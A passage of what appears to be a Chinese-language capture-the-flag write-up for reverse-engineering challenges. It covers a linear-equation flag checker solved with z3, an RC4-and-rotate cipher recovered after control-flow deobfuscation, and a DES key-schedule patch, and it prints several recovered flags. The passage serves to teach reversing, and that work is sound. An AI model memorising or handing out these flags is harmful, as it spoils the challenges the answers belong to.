0xD4 &amp;&amp; 3 * v52 - 121 * v53 + -46 * v55 + 47 * v58 + 104 * v74 + 45 * v60 + 13 * v33 - 49 * v47 + 45 * v29 == 0xCC &amp;&amp; -71 * v52 - 47 * v43 + -113 * v33 + 20 * v37 + -25 * v23 - 68 * v32 - v21 + -23 * v17 - 122 * v18 == 98 &amp;&amp; -74 * v55 + 77 * v58 + 73 * v74 - 20 * v73 + -85 * v37 + 111 * v43 + -109 * v28 + 41 * v33 + 29 * v17 == 0x94 &amp;&amp; 53 * v33 - 26 * v37 + -90 * v40 - 69 * v51 + -26 * v55 - 114 * v53 + -27 * v28 - 95 * v32 + 87 * v14 == 38 &amp;&amp; -19 * v28 + 16 * v29 + 86 * v30 + 50 * v33 + 75 * v60 - 32 * v58 + -71 * v37 + 96 * v56 + 109 * v8 + 83 * v17 == 0xA8 &amp;&amp; 33 * v32 + 89 * v36 + -27 * v81 - 56 * v71 + -101 * v37 + 19 * v53 + -97 * v16 - 110 * v29 - 59 * v8 == 82 &amp;&amp; 119 * v69 + 31 * v71 + -110 * v81 + 102 * v73 + -67 * v52 + 15 * v57 + 62 * v14 + 86 * v47 - 97 * v8 == 46 &amp;&amp; 30 * v53 + 107 * v66 + 62 * v81 - 115 * v69 + 77 * v30 + 57 * v47 + 122 * v21 - 30 * v23 - 107 * v18 == 76 &amp;&amp; 33 * v29 - 71 * v32 + 75 * v34 - 104 * v51 + 86 * v69 + 124 * v57 + -78 * v21 + 93 * v28 - 92 * v14 == 23 &amp;&amp; 114 * v36 + 43 * v47 + 63 * v51 - 70 * v52 + -37 * v69 - 82 * v58 + -5 * v17 - 114 * v21 - 101 * v10 == 16 &amp;&amp; -7 * v13 - 29 * v16 + 76 * v34 + 12 * v43 + 68 * v73 + (v52 &lt;&lt; 7) + -94 * v17 + 13 * v28 + 123 * v10 == 68 &amp;&amp; -97 * v26 + 119 * v28 + -14 * v29 - 37 * v34 + 115 * v51 - 17 * v52 + -3 * v57 + 106 * v55 + 3 * v14 == 117 &amp;&amp; -102 * v48 - 122 * v52 + 40 * v60 + 113 * v69 + -72 * v43 - 58 * v47 + -44 * v36 + 18 * v40 + 25 * v15 - 54 * v17 == 21 &amp;&amp; 54 * v69 - 97 * v75 + -15 * v37 + 69 * v61 + -109 * v32 + (v33 &lt;&lt; 7) + -44 * v13 + 9 * v26 - 44 * v8 == 95 &amp;&amp; 6 * v32 - 79 * v40 + 28 * v60 - 46 * v58 + -85 * v53 + 91 * v57 + -21 * v44 + 65 * v46 + 50 * v10 + 35 * v26 == 0x81 &amp;&amp; 28 * v13 - 84 * v23 + -22 * v71 - 51 * v60 + 95 * v51 + 49 * v59 + 91 * v28 + 15 * v45 + 101 * v8 + 69 * v10 == 0xB1 &amp;&amp; 27 * v81 - 44 * v71 + 95 * v43 + 60 * v58 + 4 * v23 - 13 * v32 + 112 * v8 - 54 * v18 - 21 * v6 == 0xAA &amp;&amp; -113 * v57 + 16 * v60 + -107 * v66 + 123 * v64 + -85 * v43 + 109 * v52 + 58 * v14 - (v30 &lt;&lt; 6) + 59 * v8 == 13 &amp;&amp; -107 * v14 + 62 * v17 + 110 * v28 - 99 * v49 + 103 * v75 + 72 * v66 + 4 * v51 + 114 * v59 + 81 * v6 == 68 &amp;&amp; 51 * v24 + 55 * v40 + 20 * v47 - 116 * v53 + 106 * v73 - 94 * v66 + -30 * v14 - 5 * v15 + 93 * v13 == 56 &amp;&amp; 87 * v74 - 45 * v65 + 72 * v53 - 11 * v61 + -115 * v23 - 9 * v43 + 37 * v13 + 109 * v17 - 70 * v6 == 119 &amp;&amp; 123 * v44 + 52 * v51 + -112 * v66 - 111 * v67 + -11 * v75 - 4 * v73 + -2 * v8 - 98 * v14 - 17 * v6 == 0xA0 &amp;&amp; 119 * v74 + 112 * v73 + 24 * v67 + 95 * v72 + -63 * v53 + 112 * v60 + -107 * v32 - 48 * v49 - 24 * v13 == 118 &amp;&amp; -64 * v30 - 125 * v43 + 59 * v53 - 52 * v55 + 31 * v64 + 28 * v66 + 52 * v17 - 53 * v24 + 35 * v12 == 90 &amp;&amp; 70 * v36 + 101 * v51 + 13 * v61 + 53 * v62 + -31 * v74 - 25 * v64 + -4 * v29 + 110 * v34 - 73 * v14 == 0x89 &amp;&amp; 45 * v14 + 41 * v18 + 29 * v67 - 75 * v66 + 75 * v28 + 110 * v29 + -65 * v8 + 12 * v10 - 45 * v4 == 54 &amp;&amp; 66 * v75 + 84 * v57 + -91 * v43 - 32 * v53 + -91 * v28 + 39 * v34 + 56 * v10 - 56 * v13 - 15 * v7 == 63 &amp;&amp; 116 * v47 + 79 * v61 + -68 * v71 + 115 * v69 + -53 * v35 + 54 * v41 + 61 * v26 + 72 * v34 + 125 * v24 == 0xDD &amp;&amp; 57 * v82 + 35 * v73 + -13 * v61 - 62 * v69 + -52 * v35 - 84 * v47 + -35 * v14 + 73 * v28 + 97 * v6 == 0xD7 &amp;&amp; -103 * v34 + 38 * v37 + 27 * v42 - 8 * v51 + -46 * v66 + 6 * v67 + 110 * v24 - 53 * v32 - 125 * v8 == 0xFD &amp;&amp; 126 * v35 + 94 * v40 + -13 * v41 + 57 * v42 + 33 * v76 - 75 * v69 + 94 * v12 - 65 * v33 - 98 * v7 == 0xBD &amp;&amp; 84 * v23 + 99 * v28 + -92 * v32 - 104 * v33 + -23 * v73 - 8 * v67 + -48 * v7 - 73 * v19 + 56 * v4 == 127 &amp;&amp; -33 * v21 - 82 * v23 + 66 * v32 - 51 * v40 + 38 * v61 + 86 * v73 - 77 * v80 + v55 - 24 * v7 == 11 &amp;&amp; 75 * v21 - 122 * v34 + -12 * v49 + 62 * v60 + 4 * (45 * v76 + v67) - 21 * v64 + -48 * v17 + 115 * v20 == 29 &amp;&amp; -40 * v81 - 115 * v71 + -30 * v60 - 13 * v62 + 113 * v53 + 96 * v57 + 63 * v27 + 119 * v33 - 78 * v19 == 78 &amp;&amp; -93 * v27 - 113 * v59 + 58 * v61 - 23 * v66 + -113 * v71 - 110 * v73 + -117 * v77 - 36 * v75 - 5 * v26 == 35 &amp;&amp; -90 * v20 + 51 * v59 + -44 * v82 + 85 * v75 + 11 * v67 - 51 * v68 + v65 + 50 * v12 + 114 * v15 == 4 &amp;&amp; 43 * v30 + 67 * v35 + 80 * v36 + 51 * v44 + -13 * v62 - 90 * v52 - v63 + 25 * v14 + 89 * v27 == 11 &amp;&amp; 91 * v21 - 117 * v26 + 28 * v32 + 109 * v36 + 38 * v44 - 97 * v54 + 3 * v75 - 123 * v62 - 112 * v4 == 104 &amp;&amp; -113 * v34 - 75 * v36 + 13 * v37 - 121 * v58 + 43 * v69 - 41 * v62 + -123 * v17 - 31 * v22 - 83 * v16 == 123 &amp;&amp; 106 * v23 - 57 * v27 + 90 * v29 + 115 * v37 + 48 * v53 + 33 * *s + 94 * v7 + 90 * v8 + 87 * v6 == 106 &amp;&amp; -93 * v38 - 52 * v41 + 45 * v71 + 38 * v52 + 54 * v20 - 13 * v27 + -51 * v18 + 96 * v19 + 109 * v13 == 20 &amp;&amp; 84 * v52 + -22 * v64 + 23 * v68 + v51 + -110 * v33 - 39 * v39 + 34 * v16 + 21 * v18 - 59 * v7 == 0x8C &amp;&amp; 87 * v21 + 63 * v24 + 55 * v33 + 12 * v35 + -100 * v67 - 3 * v60 + -51 * v9 + 3 * v20 - 106 * v4 == 69 &amp;&amp; 100 * v20 - 93 * v23 + -48 * v76 + 61 * v56 + 95 * v28 + 37 * v33 + 81 * v16 + 39 * v18 + 93 * v6 == 0xAB &amp;&amp; -21 * v26 - 84 * v39 + -8 * v40 + 74 * v51 + -95 * v69 - 125 * v57 + -89 * v24 - 79 * v25 + 39 * v21 == 1 &amp;&amp; 96 * v67 + 20 * v73 + -60 * v61 - 54 * v64 + 103 * v48 - 16 * v57 + 93 * v37 - 13 * v40 + 116 * v22 == 11 &amp;&amp; 99 * v79 + 30 * v67 + -78 * v53 + 97 * v57 + 16 * v42 - 49 * v44 + 69 * v24 - 50 * v34 - 114 * v23 == 48 &amp;&amp; 102 * v20 - 31 * v28 + 19 * v70 - 91 * v61 + -56 * v52 - 48 * v55 + -50 * v44 + 63 * v49 + 65 * v16 == 0x91 &amp;&amp; 40 * v16 - 61 * v21 + -19 * v28 - 111 * v31 + 114 * v32 + 34 * v57 + 91 * v80 - 33 * v59 + 12 * v10 - 18 * v11 == 0xC1 &amp;&amp; -105 * v78 - 11 * v70 + -77 * v67 - 120 * v68 + 123 * v31 - 34 * v64 + -20 * v21 - 14 * v30 + 68 * v9 == 0xF4 &amp;&amp; -88 * v79 + 66 * v72 + -65 * v44 + 75 * v50 + 23 * v37 + 65 * v38 + -73 * v13 - 79 * v25 + 59 * v10 == 0xAB &amp;&amp; -123 * v7 - 7 * v40 + 45 * v46 + 34 * v50 + 106 * v53 + 43 * v64 + -13 * v76 + 7 * v77 - 120 * v4 == 5 &amp;&amp; -98 * v27 + 11 * v34 + 48 * v71 + 11 * v82 + -8 * v35 + 74 * v39 + 122 * v6 + 65 * v8 + 25 * v5 == 30 &amp;&amp; 5 * v24 - 110 * v34 + 127 * v47 - 32 * v54 + -118 * v55 + 104 * v81 + v73 + 11 * v11 + 73 * v13 == 0xF0 &amp;&amp; -86 * v19 + 86 * v33 + -24 * v37 + 112 * v41 + -91 * v45 + 95 * v49 + 5 * v51 - 77 * v63 + 14 * v5 - 69 * v8 == 17 ) { puts("Correct!"); return 0; } else { puts("Nope."); return 1; } } else { fprintf(_bss_start, "Wrong length (expect %d)\n", 80); return 3; } } else { fprintf(_bss_start, "Usage: %s \"flag{...}\"\n", *argv); return 2; } } </code></pre> <p>解密脚本</p> <pre><code>from z3 import * x = [BitVec(f'x{i:02d}', 8) for i in range(80)] def V(k): return x[83 - k] s = Solver() for i in range(80): s.add(x[i] != 0) s.add(x[0] == ord('f')) s.add(x[1] == ord('l')) s.add(x[2] == ord('a')) s.add(x[3] == ord('g')) s.add(x[4] == ord('{')) s.add(-13 * V(32) == 118) s.add(23 * V(73) + 47 * x[0] + 111 * V(32) == 51) s.add(76 * V(73) + 33 * V(32) - 63 * V(18) == 81) s.add(-86 * V(73) - 25 * V(41) + 71 * V(18) + 102 * V(32) == 18) s.add(105 * V(73) - 17 * V(41) + 74 * V(18) - 25 * V(32) + V(14) == 0x95) s.add(40 * V(32) + 104 * V(41) - 89 * V(75) + 113 * V(73) + 107 * V(14) - 122 * V(18) == 75) s.add(95 * (V(78) + V(75)) + 54 * V(73) - 97 * V(37) + 24 * V(41) - 62 * V(18) + 121 * V(32) - 72 * V(14) == 0xFD) s.add(-126 * V(32) - 35 * V(37) + 66 * V(41) - 39 * V(71) + 100 * V(75) - 46 * V(73) + 54 * V(14) - 118 * V(18) == 82) s.add(-56 * V(18) + 75 * V(30) - 33 * V(32) + 110 * V(37) - 43 * V(41) + 100 * V(71) + 12 * V(73) - 16 * V(75) - 112 * V(14) == 0xAC) s.add(79 * V(30) - 67 * V(32) + 5 * V(41) - 77 * V(71) - 14 * V(73) - 85 * V(75) + 63 * V(18) + 59 * V(23) + 30 * V(14) == 51) s.add(63 * V(57) + 114 * V(71) + 103 * V(75) - 33 * V(73) + 87 * V(37) - 72 * V(41) + 104 * V(32) - V(23) + 39 * V(18) == 38) s.add(113 * V(29) - 22 * V(32) - 83 * V(75) + 35 * V(71) + 44 * V(37) - 126 * V(57) + 78 * V(18) + 99 * V(23) + 112 * V(14) == 0xC0) s.add(121 * V(36) + 32 * V(37) - 24 * V(41) - 33 * V(57) - 120 * V(71) + 71 * V(73) - 59 * V(23) + 118 * V(29) + 117 * V(18) == 62) s.add(-75 * V(73) - (V(75) &lt;&lt; 6) - 123 * V(41) + 75 * V(71) + 54 * V(29) + 39 * (V(32) + V(37)) + 83 * V(17) - 76 * V(18) == 0x89) s.add(116 * V(75) + 119 * V(43) + 36 * V(37) + 74 * V(41) - 115 * V(32) + 31 * V(36) - 125 * V(17) - 26 * V(30) + 117 * V(14) == 86) s.add(6 * V(18) - 125 * V(30) + 100 * V(73) + 53 * V(71) + 65 * V(41) - 82 * V(43) - 111 * V(32) + 5 * V(37) + 19 * V(16) == 0x9D) s.add(13 * V(18) + 29 * V(23) - 91 * V(32) - 45 * V(40) - 10 * V(41) - 82 * V(43) + 117 * V(75) - 92 * V(57) + 10 * V(14) == 0xB3) s.add(83 * V(17) - 65 * V(23) + 73 * V(32) + 57 * V(37) + 44 * V(40) - 81 * V(43) + 13 * V(73) - 49 * V(74) - 48 * V(14) == 0x8D) s.add(-76 * V(23) - 11 * V(29) + 102 * V(75) - 46 * V(73) + 31 * V(52) + 20 * V(71) + 8 * V(37) - 21 * V(43) + 37 * V(16) == 127) s.add(-75 * V(32) - 89 * V(40) - 6 * V(52) - 67 * V(57) + 82 * V(73) - 117 * V(58) - 12 * V(23) - 8 * V(30) + 55 * V(17) == 0xFE) s.add(41 * V(16) + 6 * V(18) + 56 * V(29) + 101 * V(33) - 11 * V(41) + 23 * V(43) + 19 * V(73) + 14 * V(52) + 25 * V(14) == 0xBF) s.add(-82 * V(37) - 33 * V(55) + 77 * V(74) - 60 * V(73) + 8 * V(58) + 52 * V(71) - 118 * V(33) + 78 * V(36) + 39 * V(16) == 0xD8) s.add(-119 * V(37) - 4 * V(41) + 103 * V(75) - 101 * V(73) + 62 * V(43) + 117 * V(47) + 53 * V(16) + 36 * V(32) + 65 * V(14) == 86) s.add(14 * V(23) + 31 * V(29) + 56 * V(74) - 8 * V(71) - 117 * V(53) + 118 * V(58) - V(47) + 56 * V(14) - 80 * V(17) == 0xD4) s.add(3 * V(52) - 121 * V(53) - 46 * V(55) + 47 * V(58) + 104 * V(74) + 45 * V(60) + 13 * V(33) - 49 * V(47) + 45 * V(29) == 0xCC) s.add(-71 * V(52) - 47 * V(43) - 113 * V(33) + 20 * V(37) - 25 * V(23) - 68 * V(32) - V(21) - 23 * V(17) - 122 * V(18) == 98) s.add(-74 * V(55) + 77 * V(58) + 73 * V(74) - 20 * V(73) - 85 * V(37) + 111 * V(43) - 109 * V(28) + 41 * V(33) + 29 * V(17) == 0x94) s.add(53 * V(33) - 26 * V(37) - 90 * V(40) - 69 * V(51) - 26 * V(55) - 114 * V(53) - 27 * V(28) - 95 * V(32) + 87 * V(14) == 38) s.add(-19 * V(28) + 16 * V(29) + 86 * V(30) + 50 * V(33) + 75 * V(60) - 32 * V(58) - 71 * V(37) + 96 * V(56) + 109 * V(8) + 83 * V(17) == 0xA8) s.add(33 * V(32) + 89 * V(36) - 27 * V(81) - 56 * V(71) - 101 * V(37) + 19 * V(53) - 97 * V(16) - 110 * V(29) - 59 * V(8) == 82) s.add(119 * V(69) + 31 * V(71) - 110 * V(81) + 102 * V(73) - 67 * V(52) + 15 * V(57) + 62 * V(14) + 86 * V(47) - 97 * V(8) == 46) s.add(30 * V(53) + 107 * V(66) + 62 * V(81) - 115 * V(69) + 77 * V(30) + 57 * V(47) + 122 * V(21) - 30 * V(23) - 107 * V(18) == 76) s.add(33 * V(29) - 71 * V(32) + 75 * V(34) - 104 * V(51) + 86 * V(69) + 124 * V(57) - 78 * V(21) + 93 * V(28) - 92 * V(14) == 23) s.add(114 * V(36) + 43 * V(47) + 63 * V(51) - 70 * V(52) - 37 * V(69) - 82 * V(58) - 5 * V(17) - 114 * V(21) - 101 * V(10) == 16) s.add(-7 * V(13) - 29 * V(16) + 76 * V(34) + 12 * V(43) + 68 * V(73) + (V(52) &lt;&lt; 7) - 94 * V(17) + 13 * V(28) + 123 * V(10) == 68) s.add(-97 * V(26) + 119 * V(28) - 14 * V(29) - 37 * V(34) + 115 * V(51) - 17 * V(52) - 3 * V(57) + 106 * V(55) + 3 * V(14) == 117) s.add(-102 * V(48) - 122 * V(52) + 40 * V(60) + 113 * V(69) - 72 * V(43) - 58 * V(47) - 44 * V(36) + 18 * V(40) + 25 * V(15) - 54 * V(17) == 21) s.add(54 * V(69) - 97 * V(75) - 15 * V(37) + 69 * V(61) - 109 * V(32) + (V(33) &lt;&lt; 7) - 44 * V(13) + 9 * V(26) - 44 * V(8) == 95) s.add(6 * V(32) - 79 * V(40) + 28 * V(60) - 46 * V(58) - 85 * V(53) + 91 * V(57) - 21 * V(44) + 65 * V(46) + 50 * V(10) + 35 * V(26) == 0x81) s.add(28 * V(13) - 84 * V(23) - 22 * V(71) - 51 * V(60) + 95 * V(51) + 49 * V(59) + 91 * V(28) + 15 * V(45) + 101 * V(8) + 69 * V(10) == 0xB1) s.add(27 * V(81) - 44 * V(71) + 95 * V(43) + 60 * V(58) + 4 * V(23) - 13 * V(32) + 112 * V(8) - 54 * V(18) - 21 * V(6) == 0xAA) s.add(-113 * V(57) + 16 * V(60) - 107 * V(66) + 123 * V(64) - 85 * V(43) + 109 * V(52) + 58 * V(14) - (V(30) &lt;&lt; 6) + 59 * V(8) == 13) s.add(-107 * V(14) + 62 * V(17) + 110 * V(28) - 99 * V(49) + 103 * V(75) + 72 * V(66) + 4 * V(51) + 114 * V(59) + 81 * V(6) == 68) s.add(51 * V(24) + 55 * V(40) + 20 * V(47) - 116 * V(53) + 106 * V(73) - 94 * V(66) - 30 * V(14) - 5 * V(15) + 93 * V(13) == 56) s.add(87 * V(74) - 45 * V(65) + 72 * V(53) - 11 * V(61) - 115 * V(23) - 9 * V(43) + 37 * V(13) + 109 * V(17) - 70 * V(6) == 119) s.add(123 * V(44) + 52 * V(51) - 112 * V(66) - 111 * V(67) - 11 * V(75) - 4 * V(73) - 2 * V(8) - 98 * V(14) - 17 * V(6) == 0xA0) s.add(119 * V(74) + 112 * V(73) + 24 * V(67) + 95 * V(72) - 63 * V(53) + 112 * V(60) - 107 * V(32) - 48 * V(49) - 24 * V(13) == 118) s.add(-64 * V(30) - 125 * V(43) + 59 * V(53) - 52 * V(55) + 31 * V(64) + 28 * V(66) + 52 * V(17) - 53 * V(24) + 35 * V(12) == 90) s.add(70 * V(36) + 101 * V(51) + 13 * V(61) + 53 * V(62) - 31 * V(74) - 25 * V(64) - 4 * V(29) + 110 * V(34) - 73 * V(14) == 0x89) s.add(45 * V(14) + 41 * V(18) + 29 * V(67) - 75 * V(66) + 75 * V(28) + 110 * V(29) - 65 * V(8) + 12 * V(10) - 45 * V(4) == 54) s.add(66 * V(75) + 84 * V(57) - 91 * V(43) - 32 * V(53) - 91 * V(28) + 39 * V(34) + 56 * V(10) - 56 * V(13) - 15 * V(7) == 63) s.add(116 * V(47) + 79 * V(61) - 68 * V(71) + 115 * V(69) - 53 * V(35) + 54 * V(41) + 61 * V(26) + 72 * V(34) + 125 * V(24) == 0xDD) s.add(57 * V(82) + 35 * V(73) - 13 * V(61) - 62 * V(69) - 52 * V(35) - 84 * V(47) - 35 * V(14) + 73 * V(28) + 97 * V(6) == 0xD7) s.add(-103 * V(34) + 38 * V(37) + 27 * V(42) - 8 * V(51) - 46 * V(66) + 6 * V(67) + 110 * V(24) - 53 * V(32) - 125 * V(8) == 0xFD) s.add(126 * V(35) + 94 * V(40) - 13 * V(41) + 57 * V(42) + 33 * V(76) - 75 * V(69) + 94 * V(12) - 65 * V(33) - 98 * V(7) == 0xBD) s.add(84 * V(23) + 99 * V(28) - 92 * V(32) - 104 * V(33) - 23 * V(73) - 8 * V(67) - 48 * V(7) - 73 * V(19) + 56 * V(4) == 127) s.add(-33 * V(21) - 82 * V(23) + 66 * V(32) - 51 * V(40) + 38 * V(61) + 86 * V(73) - 77 * V(80) + V(55) - 24 * V(7) == 11) s.add(75 * V(21) - 122 * V(34) - 12 * V(49) + 62 * V(60) + 4 * (45 * V(76) + V(67)) - 21 * V(64) - 48 * V(17) + 115 * V(20) == 29) s.add(-40 * V(81) - 115 * V(71) - 30 * V(60) - 13 * V(62) + 113 * V(53) + 96 * V(57) + 63 * V(27) + 119 * V(33) - 78 * V(19) == 78) s.add(-93 * V(27) - 113 * V(59) + 58 * V(61) - 23 * V(66) - 113 * V(71) - 110 * V(73) - 117 * V(77) - 36 * V(75) - 5 * V(26) == 35) s.add(-90 * V(20) + 51 * V(59) - 44 * V(82) + 85 * V(75) + 11 * V(67) - 51 * V(68) + V(65) + 50 * V(12) + 114 * V(15) == 4) s.add(43 * V(30) + 67 * V(35) + 80 * V(36) + 51 * V(44) - 13 * V(62) - 90 * V(52) - V(63) + 25 * V(14) + 89 * V(27) == 11) s.add(91 * V(21) - 117 * V(26) + 28 * V(32) + 109 * V(36) + 38 * V(44) - 97 * V(54) + 3 * V(75) - 123 * V(62) - 112 * V(4) == 104) s.add(-113 * V(34) - 75 * V(36) + 13 * V(37) - 121 * V(58) + 43 * V(69) - 41 * V(62) - 123 * V(17) - 31 * V(22) - 83 * V(16) == 123) s.add(106 * V(23) - 57 * V(27) + 90 * V(29) + 115 * V(37) + 48 * V(53) + 33 * x[0] + 94 * V(7) + 90 * V(8) + 87 * V(6) == 106) s.add(-93 * V(38) - 52 * V(41) + 45 * V(71) + 38 * V(52) + 54 * V(20) - 13 * V(27) - 51 * V(18) + 96 * V(19) + 109 * V(13) == 20) s.add(84 * V(52) - 22 * V(64) + 23 * V(68) + V(51) - 110 * V(33) - 39 * V(39) + 34 * V(16) + 21 * V(18) - 59 * V(7) == 0x8C) s.add(87 * V(21) + 63 * V(24) + 55 * V(33) + 12 * V(35) - 100 * V(67) - 3 * V(60) - 51 * V(9) + 3 * V(20) - 106 * V(4) == 69) s.add(100 * V(20) - 93 * V(23) - 48 * V(76) + 61 * V(56) + 95 * V(28) + 37 * V(33) + 81 * V(16) + 39 * V(18) + 93 * V(6) == 0xAB) s.add(-21 * V(26) - 84 * V(39) - 8 * V(40) + 74 * V(51) - 95 * V(69) - 125 * V(57) - 89 * V(24) - 79 * V(25) + 39 * V(21) == 1) s.add(96 * V(67) + 20 * V(73) - 60 * V(61) - 54 * V(64) + 103 * V(48) - 16 * V(57) + 93 * V(37) - 13 * V(40) + 116 * V(22) == 11) s.add(99 * V(79) + 30 * V(67) - 78 * V(53) + 97 * V(57) + 16 * V(42) - 49 * V(44) + 69 * V(24) - 50 * V(34) - 114 * V(23) == 48) s.add(102 * V(20) - 31 * V(28) + 19 * V(70) - 91 * V(61) - 56 * V(52) - 48 * V(55) - 50 * V(44) + 63 * V(49) + 65 * V(16) == 0x91) s.add(40 * V(16) - 61 * V(21) - 19 * V(28) - 111 * V(31) + 114 * V(32) + 34 * V(57) + 91 * V(80) - 33 * V(59) + 12 * V(10) - 18 * V(11) == 0xC1) s.add(-105 * V(78) - 11 * V(70) - 77 * V(67) - 120 * V(68) + 123 * V(31) - 34 * V(64) - 20 * V(21) - 14 * V(30) + 68 * V(9) == 0xF4) s.add(-88 * V(79) + 66 * V(72) - 65 * V(44) + 75 * V(50) + 23 * V(37) + 65 * V(38) - 73 * V(13) - 79 * V(25) + 59 * V(10) == 0xAB) s.add(-123 * V(7) - 7 * V(40) + 45 * V(46) + 34 * V(50) + 106 * V(53) + 43 * V(64) - 13 * V(76) + 7 * V(77) - 120 * V(4) == 5) s.add(-98 * V(27) + 11 * V(34) + 48 * V(71) + 11 * V(82) - 8 * V(35) + 74 * V(39) + 122 * V(6) + 65 * V(8) + 25 * V(5) == 30) s.add(5 * V(24) - 110 * V(34) + 127 * V(47) - 32 * V(54) - 118 * V(55) + 104 * V(81) + V(73) + 11 * V(11) + 73 * V(13) == 0xF0) s.add(-86 * V(19) + 86 * V(33) - 24 * V(37) + 112 * V(41) - 91 * V(45) + 95 * V(49) + 5 * V(51) - 77 * V(63) + 14 * V(5) - 69 * V(8) == 17) if s.check() == sat: m = s.model() vals = [m.evaluate(x[i]).as_long() for i in range(80)] b = bytes(vals) try: print(b.decode('latin-1')) except Exception: print(b.hex()) else: print('UNSAT') </code></pre> <p>flag{we1c0m3_7o_th3_2e_WorLd_HoPE_y#u_3nJoy_It_6Jj12Xmdy2h3wjd4rYCyARmpkIbZd$Kt}</p> <h1>6.babyre</h1> <p>IDA打开,这里可以看出是控制流扁平化混淆</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-070.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-071.png" alt="" /></p> <p>这里采用deflat.py脚本</p> <pre><code>E:\tool\deflat-master\deflat-master\flat_control_flow&gt;python deflat.py -f "E:\ctf\questionCTF2025\week3\111418_babyre\babyre" --addr 0x401AF0 </code></pre> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-072.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-073.png" alt="" /></p> <p>当然你也可以采用D810插件</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-074.png" alt="" /></p> <p>去混淆后的main函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-075.png" alt="" /></p> <p>加密函数sub_401650执行RC4 PRGA 生成密钥流并与输入逐字节 XOR ;随后将每个字节做 ROR 5(右旋五位)</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-076.png" alt="" /></p> <p>sub_401650函数有调用了sub_401180函数,他执行 RC4 的 KSA(S盒初始化与搅拌),密钥来自 0x402010 。</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-077.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-078.png" alt="" /></p> <p>最终比较密文&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-079.png" alt="" /></p> <p>脚本</p> <pre><code>def rc4_ksa(key_bytes): S = list(range(256)) j = 0 for i in range(256): j = (j + S[i] + key_bytes[i % len(key_bytes)]) &amp; 0xFF S[i], S[j] = S[j], S[i] return S def rc4_prga(S, n): i = 0 j = 0 out = [] for _ in range(n): i = (i + 1) &amp; 0xFF j = (j + S[i]) &amp; 0xFF S[i], S[j] = S[j], S[i] K = S[(S[i] + S[j]) &amp; 0xFF] out.append(K) return out def rol8(x, r): return ((x &lt;&lt; r) | (x &gt;&gt; (8 - r))) &amp; 0xFF def decrypt(cipher_bytes, key_bytes): rot_inv = [rol8(c, 5) for c in cipher_bytes] S = rc4_ksa(key_bytes[:]) ks = rc4_prga(S, len(rot_inv)) return bytes([rot_inv[i] ^ ks[i] for i in range(len(rot_inv))]) if __name__ == "__main__": key = [0x12,0x34,0x56,0x78,0x90,0xab,0xcd,0xef] cipher = [0xc6,0xac,0xee,0x8b,0x57,0x04,0x64,0x3a,0xa7,0x3b,0x84,0x67,0xac,0xd7,0x8e,0xd8,0x1d,0x03,0x85,0x55,0xf6,0x51,0x90] plain = decrypt(cipher, key) print("len", len(plain)) print("hex", plain.hex()) try: print("ascii", plain.decode('utf-8')) except UnicodeDecodeError: print("ascii", plain) </code></pre> <p>flag{Ju4t_4_S1mpl3_RC4}</p> <h1>7.strangeenc</h1> <p>main函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-080.png" alt="" /></p> <p>开头会把我们的输入做8字节对齐填充,不够8字节用#填充</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-081.png" alt="" /></p> <p>主要加密逻辑在sub_140001CC0函数里,传入明文与密钥“Koishi__”,做DES加密</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-082.png" alt="" /></p> <p>接下里看sub_140001CC0函数,这两个函数生成keys</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-083.png" alt="" /></p> <p>之后是比较</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-084.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-085.png" alt="" /></p> <p>因为是DES算法,加密与解密用到的密钥只是顺序不同,我们可以把密文patch进输入,然后把得到的keys再手动patch成逆序,之后执行完就可以得到flag</p> <p>我们先在 下个断点,然后运行,输入一些东西,然后找到输入存放的地址,把他们在patch成密文字节</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-086.png" alt="" /></p> <p>然后我们可以看到keys了,我们要手动把它逆序</p> <pre><code>bss:00007FF6AB7110C0 public Keys .bss:00007FF6AB7110C0 Keys db 0BAh ; DATA XREF: sub_7FF6AB701550+12↑o .bss:00007FF6AB7110C0 ; sub_7FF6AB701CC0+ED↑o .bss:00007FF6AB7110C1 db 0DDh .bss:00007FF6AB7110C2 db 34h ; 4 .bss:00007FF6AB7110C3 db 4Eh ; N .bss:00007FF6AB7110C4 db 0B6h .bss:00007FF6AB7110C5 db 0E0h .bss:00007FF6AB7110C6 db 0 .bss:00007FF6AB7110C7 db 0 .bss:00007FF6AB7110C8 db 0DCh .bss:00007FF6AB7110C9 db 7Dh ; } .bss:00007FF6AB7110CA db 8Eh .bss:00007FF6AB7110CB db 0F6h .bss:00007FF6AB7110CC db 16h .bss:00007FF6AB7110CD db 0E0h .bss:00007FF6AB7110CE db 0 .bss:00007FF6AB7110CF db 0 .bss:00007FF6AB7110D0 db 0F1h .bss:00007FF6AB7110D1 db 0D3h .bss:00007FF6AB7110D2 db 0E9h .bss:00007FF6AB7110D3 db 70h ; p .bss:00007FF6AB7110D4 db 0D2h .bss:00007FF6AB7110D5 db 0F4h .bss:00007FF6AB7110D6 db 0 .bss:00007FF6AB7110D7 db 0 .bss:00007FF6AB7110D8 db 2Bh ; + .bss:00007FF6AB7110D9 db 0CEh .bss:00007FF6AB7110DA db 0D3h .bss:00007FF6AB7110DB db 72h ; r .bss:00007FF6AB7110DC db 0D3h .bss:00007FF6AB7110DD db 86h .bss:00007FF6AB7110DE db 0 .bss:00007FF6AB7110DF db 0 .bss:00007FF6AB7110E0 db 1Ch 